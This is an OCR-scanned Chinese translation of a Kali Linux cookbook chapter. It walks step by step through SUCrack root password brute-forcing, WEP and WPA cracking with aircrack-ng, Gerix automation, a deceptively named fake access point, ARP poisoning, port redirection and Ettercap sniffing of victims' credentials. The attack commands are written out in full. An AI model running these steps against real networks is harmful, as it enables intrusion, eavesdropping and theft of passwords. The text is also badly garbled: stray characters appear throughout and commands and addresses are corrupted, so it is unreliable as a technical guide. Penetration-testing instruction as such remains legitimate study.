qr c ven 虽然 在 你 能 通过 其 rer Linux 系 ie 非常 nat Rd dole 
志文 件 ， 所 以 ?1 MERC 理 这 些 日 志 。 


SUCrack 拥有 几 种 备 选 的 可 用 命令 


--help 允许 你 查看 它 的 帮助 文档 。 

-1 允许 你 修改 我 们 尝试 绕 过 登录 的 用 户 。 

-s 允许 你 设置 展示 统计 信息 的 秒 数 间隔 。 默 认 值 为 3 秒 。 
-a 允许 你 设置 是 否 使 用 ANSI 转 义 代码 。 


允许 你 设置 ce s 由 于 SUCrack 是 多 线程 的 ， 你 可 以 运行 任意 多 的 线 


程 。 我 们 推荐 你 只 使 用 一 个 线程 ， 因 为 每 次 失败 的 登录 尝试 在 尝试 下 个 密码 之 前 通常 有 
三 秒 的 延迟 。 
te VE p TK 


1. 


为 了 使 用 SUCrack， 你 需要 在 启动 时 指定 单词 列表 。 否 则 ， 你 会 得 到 一 条 搞笑 的 信息 。 
打开 终端 窗口 并 执行 sucrack 命令 。 出 于 我 们 的 目的 ， 我 们 会 使 用 之 前 创建 的 自 定义 单 
词 列 表 文 件 ， 它 由 Crunch En o 但是， 你 可 以 指定 任何 希望 的 单词 列表 。 


sucrack /usr/share/wordlists/rockyou.txt 


如 果 你 打算 设置 两 个 工作 线程 ， 以 及 每 6 秒 显 示 一 次 统计 信息 ， 并 且 使 用 ANSI 转 义 代 
码 ， 你 可 以 使 用 下 列 命 令 


sucrack -w 2 -s 6 -a /usr/share/wordlists/rockyou.txt 


这 就 结束 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 SUCrack 来 对 系统 的 root 用 户 执 行 物理 访问 密码 攻击 。 使 用 单词 列表 
的 攻击 可 以 对 管理 员 (默认 ) 或 特定 用 户 指定 。 我 们 运行 sucrack 命令 ， 它 为 我 们 执行 攻 


击 。 


第 九 章 无 线 攻击 


作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 


tit : CC BY-NC-SA 4.0 
KA 
简介 


当今 ， 无 线 网 络 随处 可 见 。 由 于 用 户 四 处 奔走 ， 插 入 以 太 网 网 线 来 获取 互联 网 访问 的 方式 非 
常 不 方便 。 无 线 网 络 为 了 使 用 便利 要 付出 一 些 代 价 ; 它 并 不 像 以 太 网 连接 那样 安全 。 这 一 章 
中 ， 我 们 会 探索 多 种 方式 来 操纵 无 线 网 络 流量 ， 这 包括 移动 电话 和 无 线 网 络 。 


9.1 WEP 无 线 网 络 破解 


WEP (无 线 等 效 协 议 ) 于 1999 年 诞生 ， 并 且 是 用 于 无 线 网 络 的 最 古老 的 安全 标准 。 在 2003 
年 ，WEP 被 WPA 以 及 之 后 被 WPA2 取代 。 由 于 可 以 使 用 更 加 安全 的 协议 ，WEP Ze AR 
使 用 了 。 实 际 上 ， 推 荐 你 永远 不 要 使 用 WEP 加 密 来 保护 你 的 网 络 。 有 许多 已 知 的 方式 来 攻击 
WEP 加 密 ， 并 且 我 们 在 这 个 秘籍 中 会 探索 这 些 方式 之 一 。 


这 个 秘籍 中 ， 我 们 会 使 用 AirCrack 套件 来 破解 WEP %4 ¢ AirCrack 套件 (或 AirCrack 
NG) Æ WEP 和 WPA 和 完 码 破解 程序 ， 它 会 抓 取 无 线 网 络 封包 ， 分 析 它 们 ， 使 用 这 些 数据 来 
破解 WEP 密码 。 

准备 

为 了 执行 这 个 秘籍 中 的 任务 ， 需 要 Kali 终端 窗口 的 经 验 。 也 需要 受 支 持 的 配置 好 的 无 线 网 
卡 ， 用 于 封包 注入 。 在 无 线 网 卡 的 例子 中 ， 封 包 注 入 涉及 到 发 送 封 包 ， 或 将 它 注 入 到 双方 已 
经 建立 的 连接 中 。 请 确保 你 的 无 线 网 卡 允 许 封 包 注 入 ， 因 为 并 不 是 所 有 无 线 网 卡 都 支持 它 。 
tRVE 7 FR 

让 我 们 开始 使 用 AirCrack 来 破解 WEP te 8 85 ph] 28 2-1 © 


1. 打开 终端 窗口 ， 并 产生 无 线 网 络 接 口 的 列表 : 


airmon-ng 


:=# alrmon-ng 





在 interface 列 下 ， 选 择 你 的 接口 之 一 。 这 里 ， 我 们 使 用 wlang 。 如 果 你 的 接口 不 同 ， 
例如 mono ， 请 将 每 个 提 到 wiane 的 地 方 都 换 成 它 。 


下 面 ， 我 们 需要 停止 wano 接口 ， 并 把 它 关 闭 ， 便 于 我 们 接 下 来 修改 MAC Wh o 


airmon-ng stop 
ifconfig wlanO down 


下 面 ， 我 们 需要 修改 我 们 接口 的 MAC 地 址 。 由 于 机 器 的 MAC 地 址 会 在 任何 网 络 上 标识 
你 的 和 存在， 修改 机 器 的 标识 允许 我 们 隐藏 真正 的 MAC 地 址 。 这 里 ， 我 们 使 
用 60:11:22:33:44:55 ° 


macchanger --mac 00:11:22:33:44:55 wlanO 


5， 现 在 我 们 需要 重 局 


airmon-ng ° 


airmon-ng start wlanO 


下 面 ， 我 们 会 使 用 airodump 来 定位 附近 的 可 用 无 线 网 络 。 


airodump-ng wlanO 


文 会 出 现 可 用 无 线 网 络 的 列表 。 一 旦 你 找到 了 你 想 要 攻击 的 网 络 ， 按 下 ctrl + C 来 停止 
搜索 。 选 中 BssID 列 中 的 MAC 地 址 ， 右 击 你 的 鼠标 ， 并 且 选 择 复 制 。 同 时 ， 把 网 络 正 在 


发 送 哪 个 频道 的 信号 记录 下 载 。 你 会 在 channel 列 中 找到 这 个 人 信息。 这里， 这 个 频道 


8， 现 在 运行 airodump ， 并 且 将 所 选 


BSSID 的 信息 复制 到 文件 中 。 我 们 会 使 用 下 列 选 
o -c 允许 我 们 选择 频道 


这 里 我 们 选择 10 © 


o -w 允许 我 们 选择 文件 名 称 。 这 里 我 们 选 


o -bssid 允许 我 们 选择 我 们 的 BssID ° 


先 择 wirelessattack ° 


这 里 ， 我 们 从 剪贴 板 上 粘贴 99:AC:90:AB:78 ° 


airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlanO 


9. 新 的 窗口 会 打开 ， 并 展示 这 个 命令 的 输出 。 保 持 这 个 窗口 开 着 。 
10. 打开 另 一 个 终端 窗口 ， 为 了 尝试 组 合 它 们 ， 我 们 运行 aireplay 。 它 拥有 下 列 语 
法 : aireplay-ng -1 © -a [BSSID] -h [our chosen MAC address] -e [ESSID] [Interface] 


Oo 


aireplay-ng -1 © -a 09:AC:90:AB:78 -h 00:11:22:33:44:55 -e backtrack wlanO 


11. 下面， 我 们 发 送 充 量 给 路 由 蜂 ， 便 于 捕获 一 些 数据 。 我 们 再 次 使 用 aireplay ^ VAT 


列 格 式 : aireplay-ng -3 -b [BSSID] - h [Our chosen MAC address] [Interface] ° 


aireplay-ng -3 -b 09:AC:90:AB:78 -h 00:11:22:33:44:55 wlanO 


12. 你 的 屏幕 会 开始 被 流量 填 满 。 将 它 运行 一 到 两 分 钟 ， 直 到 你 拥有 了 用 来 执行 破解 的 信 
AL o 


13， 最 后 我 们 运行 AirCrack 来 破解 WEP 密码 。 


aircrack-ng -b 09:AC:90:AB:78 wirelessattack.cap 
这 就 结束 了 。 


工作 原理 


在 这 个 秘籍 中 ， 我 们 使 用 了 AirCrack 套件 来 破解 无 线 网 络 的 WEP 密码 。AirCrack 是 最 流行 
的 WEP 破解 工具 之 一 。AirCrack 通过 收集 WEP 无 线 连接 的 封包 来 工作 ， 之 后 它 会 通过 算术 
分 析 数 据 来 破解 WEP 加 密 密 码 。 我 们 通过 启动 AirCrack 并 选择 我 们 想 要 的 接口 来 开始 。 下 
面 ， 我 们 修改 了 MAC 地 址 ， 这 允许 我 们 修改 互联 网 上 的 身份 ， 之 后 使 用 airodump 搜索 可 用 
的 无 线 网 络 来 攻击 。 一 旦 我 们 找到 了 打算 攻击 的 网 络 ， 我 们 使 用 aireplay 来 将 我 们 的 机 器 与 
正在 攻击 的 无 线 设 备 的 MAC 地 址 关联 。 我 们 最 后 收集 到 了 一 些 流量 ， 之 后 暴力 破解 生成 的 
CAP 文件 来 获得 无 线 狗 码 。 


5.2 WPA/WPA2 无 线 网 络 破解 
WPA (无 线 保 护 访问 ) 于 2003 年 诞生 ， 并 且 为 保护 无 线 网 络 和 取代 过 时 的 昌 标 准 WEP 而 创 
建 。WEP 被 WPA 以 及 之 后 的 WPA2 代替 。 由 于 存在 更 加 安全 的 协议 ，WEP 很 少 使 用 了 。 


这 个 秘籍 中 ， 我 们 会 使 用 AirCrack 套件 来 破解 WPA 密码 。 AirCrack 套件 (或 AirCrack 
NG) Æ WEP 和 WPA 密码 破解 程序 ， 它 抓 取 网 络 封包 ， 分 析 它 们 ， 并 使 用 这 些 数据 破解 
WPA 密码 。 


准备 
为 了 执行 这 个 秘籍 中 的 任务 ， 需 要 Kali 终端 窗口 的 经 验 。 也 需要 受 支持 的 配置 好 的 无 线 网 


卡 ， 用 于 封包 注入 。 在 无 线 网 卡 的 例子 中 ， 封 包 注入 涉及 到 发 送 封包 ， 或 将 它 注入 到 双方 已 
经 建立 的 连接 中 。 


操作 小 


让 我 们 开始 使 用 AirCrack 来 破解 WEP 加 密 的 网 络 会 话 。 
.打开 终端 窗口 ， 并 产生 无 线 网 络 接 口 的 列表 : 


airmon-ng 


:~# alrmon-ng 





在 interface 列 下 ， 选 择 你 的 接口 之 一 。 这 里 ， 我 们 使 用 wlang 。 如 果 你 的 接口 不 同 ， 
例如 mono ， 请 将 每 个 提 到 wlano 的 地 方 都 换 成 它 


3， 下 面 ， 我 们 需要 停止 wlano 接口 ， 并 把 它 关 闭 ， 便 于 我 们 接 下 来 修改 MAC 地 址 。 
airmon-ng stop 
ifconfig wlanO down 
4. 


下 面 ， 我 们 需要 修改 我 们 接口 的 MAC 地 址 。 由 于 机 器 的 MAC 地 址 会 在 任何 网 络 上 标识 
你 的 存在 ， 修 改 机 器 的 标识 允许 我 们 隐藏 夏 正 的 MAC 地 址 。 这 里 ， 我 们 使 


用 00:11:22:33:44:55 ° 


macchanger --mac 00:11:22:33:44:55 wlanO 


5. 现在 我 们 需要 重 尼 airmon-ng ° 


airmon-ng start wlanO 


. 下面， 我 们 会 使 用 airodump 来 定位 附近 的 可 用 无 线 网 络 。 


airodump-ng wlanO 


出 现 可 用 无 线 网 络 的 列表 。 一 旦 你 找到 了 你 想 要 攻击 的 网 络 
搜索 。 


， 按 下 ctrl +c 来 停止 
选中 BssID 列 中 的 MAC 地 址 ， 右 击 你 的 鼠标 ， 并 且 选 择 复制 。 同 时 ， 把 网 络 正在 
发 送 哪 个 频道 的 信号 记录 下 载 。 你 会 在 channel 列 中 找到 这 
Æ 10 ° 


个 信息 。 这 里 ， 这 个 频道 


现在 运行 airodump ， 并 且 将 所 选 


BSSID 的 信息 复制 到 文件 中 。 我 们 会 使 用 下 列 选 
o .c 允许 我 们 选择 频道 


这 里 我 们 选择 10 © 
o .w 允许 我 们 选择 文件 名 称 。 这 里 我 们 选择 
o -bssid 允许 我 们 选择 我 们 的 BssID ° 


wirelessattack ° 


这 里 ， 我 们 从 剪贴 板 上 粘贴 09:AC:90:AB:78 ° 


airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlanO 


9. 新 的 禄 口 会 打开 ， 并 展示 这 个 命令 的 输出 。 保 持 这 个 窗口 开 着 。 


10. 打开 另 一 个 终端 窗口 ， 为 了 尝试 组 合 它 们 ， 我 们 运行 aireplay » CHA FAI 


法 : aireplay-ng -1 0 -a [BSSID] -h [our chosen MAC address] -e [ESSID] [Interface] ° 


Aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0 


11. 最 后 我 们 运行 AirCrack 来 破解 WEP RA o -w 选项 允许 我 们 指定 单词 列表 的 位 置 。 我 
们 使 用 事先 命名 的 .cap 文件 。 这 里 ， 文 件 名 称 是 wirelessattack.cap “ 


Aircrack-ng -w ./wordlist.lst wirelessattack.cap 
这 就 结束 了 。 


工作 原理 


在 这 个 秘籍 中 ， 我 们 使 用 了 AirCrack 套件 来 破解 无 线 网 络 的 WPA #45 » AirCrack 是 最 流行 
的 WPA 破解 工具 之 一 。AirCrack 通过 收集 WPA 无 线 连接 的 封包 来 工作 ， 之 后 它 会 通过 算 
分 析 数 据 来 破解 WPA 加 密 密 码 。 我 们 通过 启动 AirCrack 并 选择 我 们 想 要 的 接口 来 开始 。 下 
面 ， 我 们 修改 了 MAC 地址 ， 这 允许 我 们 修改 互联 网 上 的 身份 ， 之 后 使 用 airodump 搜索 可 用 
的 无 线 网 络 来 攻击 。 一 旦 我 们 找到 了 打算 攻击 的 网 络 ， 我 们 使 用 aireplay 来 将 我 们 的 机 器 与 
正在 攻击 的 无 线 设备 的 MAC 地 址 关联 。 我 们 最 后 收集 到 了 一 些 流 量 ， 之 后 暴力 破解 生成 的 
CAP XARRI HRB AG o 


9.3 无 线 网 络 自 动 化 破解 


这 个 秘籍 中 我 们 会 使 用 Gerix 将 无 线 网 络 攻 击 自 动 化 。Gerix 是 AirCrack 的 自动 化 GUI » Gerix 
默认 安装 在 Kali Linux 中 ， 并 且 能 够 加 速 我 们 的 无 线 网 络 破解 过 程 。 


准备 
为 了 执行 这 个 秘籍 中 的 任务 ， 需 要 Kali 终端 窗口 的 经 验 。 也 需要 受 支 持 的 配置 好 的 无 线 网 


卡 ， 用 于 封包 注入 。 在 无 线 网 卡 的 例子 中 ， 封 包 注 入 涉及 到 发 送 封包 ， 或 将 它 注 入 到 双方 已 
经 建立 的 连接 中 。 


操作 水 


让 我 们 开始 使 用 Gerix 进行 自动 化 的 无 线 网 络 破解 。 首 先 下 载 它 : 


1. 使 用 wget ， 访 问 下 面 的 网 站 并 下 载 Gerix : 


wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/ downloads/gerix-wifi-c 
racker-master.rar 


2. 文件 下 载 好 之 后 ， 我 们 需要 从 RAR 文件 中 解压 数据 。 


unrar x gerix-wifi-cracker-master.ra 


3. 现在 ， 为 了 保持 文件 一 致 ， 让 我 们 将 Gerix 文件 夹 移动 到 susr/share 目录 下 ， 和 其 它 涂 
透 测试 工具 放 到 一 起 。 


mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker 


4.， 让 我 们 访问 Gerix 所 在 的 目录 : 


cd /usr/share/gerix-wifi-cracker 


5. 我 们 键入 下 列 命令 来 启动 Gerix : 


python gerix.py 


x Gerix wifi cracker 


Welcome | Configuration | WEP | WPA | Fake AP | Cracking | Database | Credits | 





Hello and Welcome! 

Gerix Wifi Cracker is a GUI that can help you to work in Wireless 802.11 Penetration Test 
Created by Emanuele emgent' Gentili and Emanuele crossbower Acri The tool is under GPL 2 
License 

enjoy! 





20:33:56 - database reloaded: /root/.germ-wific racker/key-database.db [Success] 


6. a configuration (配置 ) 标签 页 。 


10. 


11. 


12. 


13. 


14. 


15. 


16. 


17. 


18. 


19. 


20. 


21. 


22. 


在 Configuration 标签 页 中 ， 选 择 你 的 无 线 接口 。 
点 击 Enable/Disable Monitor Mode (开启 /停止 监控 器 模式 ) 按钮 9 


在 监控 模式 启动 之 后 ， 在 Select Target Network (选择 目标 网 络 ) 下 面 ， 
Rescan Networks (重新 扫描 网 络 ) 按钮 。 


目标 网 络 的 列表 会 卉 满 。 选 择 无 线 网 络 作为 目标 。 这 里 ， 我 们 选择 了 WEP 加 密 的 网 络 。 


& i WEP 标签 页 。 





Welcome | Configuration | WEP | wea | Fake AP | Cracking | Database | Credits 
Welcome in WEP Attacks Control Panel 
General functionalities 


Functionalities 


Start Sniffing and Logging 





Tests 


Performs a test of injection AP 





在 Functionalities (功能 ) 中， 点 击 start Sniffing and Logging (FÈ AREER) 
按钮 。 


Ad: WEP Attacks (No Client) (WEP 攻击 无 客户 端 ) 子 标签 页 。 


点 击 Start false access point authentication on victim (开启 目标 上 的 伪造 接 入 点 验 


E) 按钮 。 

点 击 Start the ChopChop attack (开始 断 续 攻击 ) 按钮 。 

在 打开 的 终端 窗口 中 ， 对 Use this packet (使 用 这 个 封包 ) 问题 回答 ia ° 
完成 之 后 ， 复 制 生 成 的 .Cap 文件 。 


点 击 Create the ARP packet to be injected on the victim access point (创建 注入 到 目 
标 接 入 点 的 ARP 封包 ) 按钮 。 


点 击 Inject the created packet on victim access point (将 创 | 建 的 封包 注入 到 目标 接 入 


点 ) 按钮 。 

在 打开 的 终端 窗口 中 ， 对 Use this packet 问题 回答 v œ 

收集 了 大 约 20000 个 封包 之 后 ， 点 击 cracking (破解 ) 标签 页 。 
Ad: Aircrack-ng - Decrypt WEP Password (4% WEP #43) 按钮 。 


这 就 结束 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 了 Gerix 来 自动 化 破解 无 线 网 络 ， 为 获得 WEP 密码 。 我 们 以 启动 
Gerix 并 开局 监控 模式 接口 来 开始 这 个 秘籍 。 下 面 ， 我 们 从 由 Gerix 提供 的 攻击 目标 
选择 我 们 的 目标 。 在 我 们 开始 嗅 探 网 络 流量 之 后 ， 我 们 使 用 Chop Chop 来 生成 CAP 文件 。 
我 们 最 后 以 收集 20000 个 封包 并 使 用 AirCrack 暴力 破解 CAP 文件 来 结束 这 个 秘籍 


使 用 Gerix » 441 18% E T WEP 密码 的 步 又， 而 不 需要 手动 在 终端 窗口 中 键入 命令 。 
这 是 一 种 非常 棒 的 方式 ， 能 够 快速 高 效 地 破解 WEP 加 密 的 网 络 。 

9.4 使 用 伪造 接 入 点 连接 客户 端 

这 个 秘籍 中 ， 我 们 会 使 用 Gerix 来 创建 并 设置 伪造 接 入 点 (AP) 。 建 立 伪 造 接 入 点 让 我 们 能 
够 收集 每 个 连接 它 的 计算 机 的 信息 。 人 们 通常 会 为 了 便利 而 牺牲 安全 。 连 接 到 开放 无 线 接 入 


点 并 发 送 简短 的 电子 邮件 ， 或 登录 到 社交 网 络 中 非常 方便 。Gerix 是 AirCrack 的 自动 化 
GUI 。 


准备 
为 了 执行 这 个 秘籍 中 的 任务 ， 需 要 Kali Aim WON Ao MER NABH Jo 43 M 


卡 ， 用 于 封包 注入 。 在 无 线 网 卡 的 例子 中 ， 封 包 注入 涉及 到 发 送 封包 ， 或 将 它 注入 到 双方 已 
经 建立 的 连接 中 。 


TRE Ty 3 
让 我 们 开始 使 用 Gerix 创建 伪造 的 AP 。 


1， 让 我 们 访问 Gerix 所 在 的 目录 : 


cd /usr/share/gerix-wifi-cracker 


2. 键入 下 面 的 命令 来 使 用 Gerix : 


python gerix.py 


x Gerix wifi cracker 


Welcome | Configuration | WEP | wea | Fake AP | Cracking | Database | Credits 





Hello and Welcome! 

Gerix Wifi Cracker i$ a GUI that can help you to work in Wireless 802.11 Penetration Test 
Created by Emanuele emgent Gentili and Emanuele crossbower Acri. The tool is under GPL 2 
License 

enjoy! 





20:33:56 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


点 击 Configuration (配置 ) 标签 页 。 
在 configuration 标签 页 中 ， 选 择 你 的 无 线 接 口 。 
点 击 Enable/Disable Monitor Mode (开启 /停止 监控 器 模 A) du 2 


在 监控 模式 司 动 之 后 ， 在 Select Target Network (选择 目标 网 络 ) 下 面 ， 
Rescan Networks (重新 扫描 网 络 ) 按钮 。 


目标 网 络 的 列表 会 境 满 。 选 择 无 线 网 络 作为 目标 。 这 里 ， 我 们 选择 了 WEP 加 密 的 网 络 。 


点 击 Fake AP (伪造 接 入 点 ) 标签 页 。 


Welcome | Configuration | WEP | WPA | Fake AP | Cracking | Database | Credits | 


Welcome in Fake Access Point Control Panel 
Create Fake AP 


Access point ESSID: 


[honeypot | 


Access point channel: 


MA 





Cryptography tags — — .| Key in Hex (Ex. aabbccddee) or Empty: 


[ WEP ( None C WPA (C WPA2 
| E [aabbceddee 


WPA/WPA2 types- 














("* WEP40 C TKIP C WRAP C CCMP C WEP104 





- Options 
| [ AdHoc mode [ Hidden SSID [ Disable broadcast probes 「 Respond to all probes 


Start Fake Access Point | 


9. 修改 Access Point ESSID ( 接 入 点 ESSID) ， 将 其 从 honeypot 修改 为 不 会 引起 怀疑 的 名 
称 。 这 里 我 们 使 用 personalnetwork ° 





Access point ESSID: 





personalnetwork 


10. 其 它 选项 使 用 默认。 为 了 开启 伪造 接 入 上 点， 点 击 Start Face Access Point (开启 伪造 接 
入 点 ) 按钮 。 


Start Fake Access Point 





这 就 结束 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 了 Gerix 来 创建 伪造 接 入 点 。 创 建 伪 造 接 入 点 是 一 个 非 第 好 的 方式 ， 
来 收集 没有 防备 用 户 的 信息 。 原 因 是 ， 对 于 受害 者 来 说 ， 它 们 表现 为 正常 的 接 入 点 ， 所 和 欲 会 
使 它 被 用 户 信任 。 使 用 Gerix， 我 们 可 以 只 通过 几 次 点 击 来 自动 化 创建 和 设置 伪造 接 入 点 。 


sD el I 
9.5 URL 流量 操纵 
这 个 秘籍 中 ， 我 们 会 进行 URL 流量 操纵 攻击 。URL 流量 操纵 非常 类 似 于 中 间 人 攻击 ， 因 为 我 
们 会 让 去 往 互 联网 的 流量 首先 通过 我 们 的 机 器 。 我 们 使 用 ARP 章 化 来 执行 这 个 攻击 。ARP 每 
化 是 一 种 技巧 ， 让 我 们 能 够 在 局 域 网 中 发 送 坎 骗 性 的 ARP 信息 给 受害 者 。 我 们 会 使 用 


arpspoof 来 执行 这 个 秘籍 。 


操作 步骤 
让 我 们 开始 进行 URL 流量 操纵 。 


1， 打 开 终端 窗口 并 执行 下 面 的 命令 ， 来 配置 IP 表 使 我 们 能 够 劫持 流量 : 


sudo echo 1 >> /proc/sys/net/ipv4/ip_forward 


2. 下 面 ， 我 们 启动 arpspoof REALM LSA EMIRU AARE RAT P > RIE 
局 域 网 中 使 用 Windows 7 主机 ， 地 址 为 192.168.10.115 ° Arpspoof 有 一 些 选项 ， 包 括 : 


o -i 允许 我 们 选择 目标 接口 。 这 里 我 们 选择 wlang 。 
o -t 允许 我 们 指定 目标 。 
整个 命令 的 语法 


am 


FE arpspoof -i [interface] -t [target IP address] [destination IP address] ° 


sudo arpspoof -i wlanO -t 192.168.10.115 192.168.10.1 


3， 接 着 ， 我 们 执行 另 一 个 arpspoof 命令 ， 它 会 从 上 一 个 命令 的 目的 地 (这 里 是 默认 网 关 ) 
取 回 流量 ， 并 使 流量 经 过 我 们 的 Kali 主机 。 这 个 例子 中 ， 我 们 的 IP 地 址 


是 192.168.10.110 ° 


sudo arpspoof -i wlanO -t 192.168.10.1 192.168.10.110 
这 就 结束 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 arpspoof 通过 ARP 毒化 来 操纵 受害 者 主机 到 路 由 器 之 间 的 流量 ， 使 
其 通过 我 们 的 Kali 主机 。 一 旦 流量 被 重 定向 ， 我 们 就 可 以 对 受害 者 执行 其 它 攻击 ， 包 括 记 录 
键盘 操作 ， 跟 踪 浏 览 的 网 站 ， 以 及 更 多 。 


9.6 35 vU * X 


这 个 秘籍 中 ， 我 们 使 用 Kali RAT IG 9 X 9) o nn Bc n de A XU UE AD o x8 0 * x ey 
及 到 接收 发 往 共 个 端口 ， 比 如 80 的 数据 包 ， 并 把 它 重 定向 到 不 同 的 端口 上 ， 比 如 8080 © dA 


行 这 类 攻击 的 好 处 很 多 ， 因 为 你 可 以 将 安全 的 端口 重 定向 为 非 安全 的 端口 ， 或 者 将 流量 重 定 
向 到 特定 的 设备 的 特定 端口 ， 以 及 其 它 。 


aR TE 27 3 
让 我 们 开始 进行 端口 重 定向 /转发 。 
， 打 开 终端 窗口 并 执行 下 列 命令 来 配置 IP 表 ， 使 我 们 能 够 动 持 流量 : 


Sudo echo 1 >> /proc/sys/net/ipv4/ip_forward 


2. To’ RIEZ arpspoof 来 毒化 去 往 默认 网 关 的 流量 。 这 个 例子 中 ， 默 认 网 关 的 IP 地 址 
为 ”192.168.10.1 ° Arpspoof 有 一 些 选项 ， 包 括 : 


o -i 允许 我 们 选择 目标 接口 。 这 里 我 们 选择 wlano © 


He AN ap a 信 的 语法 是 arpspoof -i [interface] [destination IP address] ° 


sudo arpspoof -i wlanO 192.168.10.1 


3 接着， 我 们 执行 另 一 个 arpspoof 命令 ， 它 会 从 上 一 个 命令 的 目的 地 (这 里 是 默认 网 关 ) 
取 回 流量 ， 并 使 流量 经 过 我 们 的 Kali 主机。 这 个 例子 中 ， 我 们 的 IP 地 址 


是 192.168.10.110 ° 


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8 
080 


这 就 结束 了 。 


工作 原理 


个 秘籍 中 ， 我 们 使 用 arpspoof 通过 ARP 14k Fe IPTables 将 网 络 上 发 到 端口 80 的 
流量 重 定 向 到 8080。 执 行 这 类 攻击 的 好 处 很 多 ， 因 为 你 可 以 将 安全 的 端口 重 定 向 为 非 安全 的 
端口 ， 或 者 将 流量 重 定向 到 特定 的 设备 的 特定 端口 ， 以 及 其 它 。 


9.7 "RAM 76 7L 


这 个 秘籍 中 ， 我 们 会 实验 网 络 流量 的 嗅 探 。 网 络 流量 噢 探 涉 及 到 拦截 网 络 封包 ， 分 析 它 们 ， 
之 后 将 流量 解码 (如 果 需 要 ) 来 展示 封包 中 的 信息 。 流 量 噢 探 特 别 在 目标 的 信息 收集 中 非常 

有 用 ， 因 为 取决 于 所 浏览 的 网 站 ， 你 可 以 看 见 所 浏览 的 网 址 、 用 户 名 、 密 码 和 其 它 可 以 利用 
的 信息 。 


我 们 在 这 个 秘籍 中 会 使 用 Ettercap ， 但 是 你 也 可 以 使 用 Wireshark。 处 于 展示 目的 ，Ettercap 
N 用 嗅 探 原理 。 一 旦 建立 起 对 噢 探 过 程 的 理解 ， 你 可 以 使 用 Wireshark 来 
行 更 详细 的 分 析 。 


准备 
这 个 秘籍 需要 为 封包 注入 配置 好 的 无 线 网 卡 ， 虽 然 你 可 以 在 有 线 网 络 上 执行 相同 步骤 。 在 无 
线 网 卡 的 情况 下 ， 封 包 注 入 涉及 到 将 封包 发 送 或 注入 到 双方 已 经 建立 的 连接 中 。 


让 我 们 启动 Ettercap 来 开始 网 络 流量 的 嗅 探 。 


1， 打 开 终 端 窗口 并 局 动 Ettercap。 使 用 -6 选项 加 载 GUI : 


ettercap -G 


* ettercap 0.7.4.1 





2， 我 们 以 打开 Unified sniffing 《统一 噢 探 ) 开始 。 你 可 以 按 下 shift + u 或 者 访问 菜单 


中 的 sniff | Unified sniffing 。 





3. 选择 网 络 接口 。 在 发 起 MITM 攻击 的 情况 中 ， 我 们 应 该 选项 我 们 的 无 线 接口 。 


| * ettercap Input 


ey Network interface: |00 


| OK | Cancel | 





下 面 ， 我 们 打开 scan for hosts (扫描 主机 ) 。 可 以 通过 按 下 ctrl s 或 访问 菜单 栏 


的 Hosts | Scan for hosts 来 完成 。 





下 面 ， 我 们 得 到 了 Host List. (主机 列表 ) 。 你 可 以 按 下 H 或 者 访问 菜单 栏 


的 Hosts | Host List ° 


* ettercap 0.7.4.1 





T 的 目标 。 在 我 们 的 例子 中 ， 我 们 选择 192.168.10.111 作为 
我 们 的 Target 1 ， 通 过 选中 它 的 IP 地 址 并 按 下 Add To Target 1 (添加 到 目标 1) d£ 
$R o 


ettercap 0.7.4.1 





| Host List X | 
IP Address MAC Address ^ Description [^ 


Fes ee UT OT 


192.168.10.102 00:0D:93:7A:EA:CB 
192.168.10.107 00:18:E7:07:BE:70 
192.168.10.108 00:08:50:29:26:FF 
192.168.10.110 00:02:A5:B1:EB:0F 


132.168.10.111 08:00:27:17:81:3C 
197.168.10.117 08:00:27 7:19:BD-BB8 





192.168.10.150 00:80:77:07:80:A3 
Delete Host Add to Target 1 Add to Target 2 















































































































































55 ports monitored 
7587 mac vendor fingerprint I 
1766 tcp OS fingerprint | 
2183 known services 
Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts. 
9 hosts added to the hosts list... | 


7. 现在 我 们 能 够 让 Ettercap 开始 噢 探 了 。 你 可 以 按 下 ctrl +w 或 访问 菜单 栏 


的 Start | Start sniffing ° 


* ettercap 0.7.4.1 


去 用 i 
一 b FIL] " LT | 





8. 有 最后 ， 我 们 开始 进行 ARP 毒化 。 访 问 菜单 栏 的 Mitm | Arp poisoning ° 


* ettercap 0.7.4.1 


— 
| = © b= "TI. |". P 
larch 310 对 Pai 





D 
9. 在 出 现 的 窗口 中 ? 选中 Sniff remote connections ( 嗅 探 远程 连接 ) 的 选项 
MITM Attack: ARP Poisoning 


Optional parameters 
č |Sniff remote connections. 


N Only poison one-way. 


| | Cancel | 





10. 取决 于 网 络 环境 ， 我 们 会 看 到 信息 。 


* ettercap 0.7.4.1 


7587 mac vendor fingerprint 

1766 tcp OS fingerprint 

2183 known services 

Randomizing 255 hosts for scanning.. 
Scanning the whole netmask for 255 hosts.. 
3 hosts added to the hosts list 

Starting Unified sniffing.. 


ARP poisoning victims: 


GROUP 1 : ANY (all the hosts in the list) 











GROUP 2 : AN' (all the hosts in the list) 





11. 一 旦 我 们 找到 了 想 要 找 的 信息 AP S e Be) 。 我 们 可 以 关闭 Ettercap。 你 可 以 按 
下 ctrl + E 或 访问 菜单 栏 的 start | Stop sniffing 来 完成 它 。 


x ettercap 0.7.4.) 


12. 





工作 原理 


这 个 秘籍 包括 了 MITM 攻击 ， 它 通过 ARP 毒化 来 窃听 由 用 户 发 送 的 无 线 网 络 通信 。 我 们 以 局 
动 Ettercap 并 扫描 主机 来 开始 这 个 秘籍 。 之 后 我 们 开始 进行 网 络 的 ARP. IU o ARP XU E 
一 种 技巧 ， 允 许 你 发 送 伪造 的 ARP. 信息 给 局 域 网 内 的 受害 者 。 


我 们 以 启动 封包 噢 探 并 停止 ARP 章 化 让 网 络 恢复 正常 来 结束 。 这 个 步骤 在 侦 测 过 程 中 很 关 
键 ， 因 为 在 你 俘 止 毒化 网 络 时 ， 它 让 网 络 不 会 前 溃 。 


x 


